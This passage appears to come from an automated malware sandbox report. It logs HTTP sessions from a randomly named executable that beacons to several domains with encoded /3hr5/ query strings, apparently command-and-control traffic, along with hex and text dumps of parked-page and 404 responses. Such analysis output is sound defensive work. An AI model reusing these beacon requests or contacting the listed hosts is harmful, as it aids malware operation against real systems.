                                                                                                                              Data Raw: 31 37 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 3a 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 3d 27 20 72 65 6c 3d 27 69 63 6f 6e 27 3e 0a 3c 74 69 74 6c 65 3e 72 69 74 75 61 6c 79 6f 67 61 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 66 37 65 37 66 33 30 64 38 31 32 64 30 66 33 39 35 30 39 31 38 63 37 35 36 32 64 66 37 65 36 38 65 65 65 65 62 64 38 36 34 39 62 64 65 61 32 62 63 33 38 34 34 65 62 30 37 66 63 38 32 36 39 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                                                              Data Ascii: 1755<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>ritualyoga.org is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.
                                                                                                                              Dec 4, 2023 15:29:34.763916969 CET1328INData Raw: 68 6f 76 65 72 2e 63 6f 6d 2f 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61
                                                                                                                              Data Ascii: hover.com/?source=parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>ritualyoga.org</h1><h2>is a totally awesome idea still being
                                                                                                                              Dec 4, 2023 15:29:34.763979912 CET1328INData Raw: 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77
                                                                                                                              Data Ascii: "https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></u
                                                                                                                              Dec 4, 2023 15:29:34.764036894 CET1328INData Raw: 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39 2e 32 34 33 34 34 2c 2d 31 2e 34 36 37 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e
                                                                                                                              Data Ascii: 359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.1
                                                                                                                              Dec 4, 2023 15:29:34.764090061 CET1328INData Raw: 4d 37 36 38 20 31 32 37 30 20 71 2d 37 20 30 20 2d 37 36 2e 35 20 30 2e 35 74 2d 31 30 35 2e 35 20 30 74 2d 39 36 2e 35 20 2d 33 74 2d 31 30 33 20 2d 31 30 74 2d 37 31 2e 35 20 2d 31 38 2e 35 71 2d 35 30 20 2d 32 30 20 2d 38 38 20 2d 35 38 74 2d
                                                                                                                              Data Ascii: M768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.
                                                                                                                              Dec 4, 2023 15:29:34.764132023 CET218INData Raw: 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 20 20 0a 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41
                                                                                                                              Data Ascii: nt,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              106192.168.11.205023737.97.254.27808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:29:39.943886042 CET528OUTGET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rocsys.net
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:29:40.122477055 CET1340INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                                                              Server: Apache
                                                                                                                              Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                              X-Varnish: 1067597919 3
                                                                                                                              Age: 19015378
                                                                                                                              Via: 1.1 varnish (Varnish/6.1)
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 64668
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                                                              Dec 4, 2023 15:29:40.122555971 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c
                                                                                                                              Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space
                                                                                                                              Dec 4, 2023 15:29:40.122617006 CET1340INData Raw: 63 2d 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e
                                                                                                                              Data Ascii: c-2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                                                              Dec 4, 2023 15:29:40.122673035 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                                                                              Dec 4, 2023 15:29:40.122726917 CET1340INData Raw: 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20
                                                                                                                              Data Ascii: erved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <
                                                                                                                              Dec 4, 2023 15:29:40.122782946 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c
                                                                                                                              Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo
                                                                                                                              Dec 4, 2023 15:29:40.122838020 CET1340INData Raw: 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                                                              Dec 4, 2023 15:29:40.122994900 CET1340INData Raw: 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: a href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width=
                                                                                                                              Dec 4, 2023 15:29:40.123054028 CET1340INData Raw: 30 31 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e
                                                                                                                              Data Ascii: 01h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g
                                                                                                                              Dec 4, 2023 15:29:40.123111010 CET1340INData Raw: 37 2c 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: 7,25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-
                                                                                                                              Dec 4, 2023 15:29:40.298896074 CET1340INData Raw: 20 20 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c
                                                                                                                              Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              107192.168.11.2050238108.179.192.34808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:29:50.616137981 CET540OUTGET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.metodomestredojogo.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:29:50.831990957 CET529INHTTP/1.1 301 Moved Permanently
                                                                                                                              Date: Mon, 04 Dec 2023 14:29:50 GMT
                                                                                                                              Server: Apache
                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                              X-Redirect-By: WordPress
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Location: http://metodomestredojogo.com/3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38
                                                                                                                              Content-Length: 0
                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              108192.168.11.2050239198.177.123.106808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:29:56.017821074 CET536OUTGET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.echolinkevolve.xyz
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:29:56.339462996 CET602INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 04 Dec 2023 14:29:56 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              109192.168.11.2050240198.252.98.6480
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:30:02.618408918 CET541OUTGET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.rtptornado4dnihboss.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:30:02.795258045 CET999INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 708
                                                                                                                              date: Mon, 04 Dec 2023 14:30:02 GMT
                                                                                                                              server: LiteSpeed
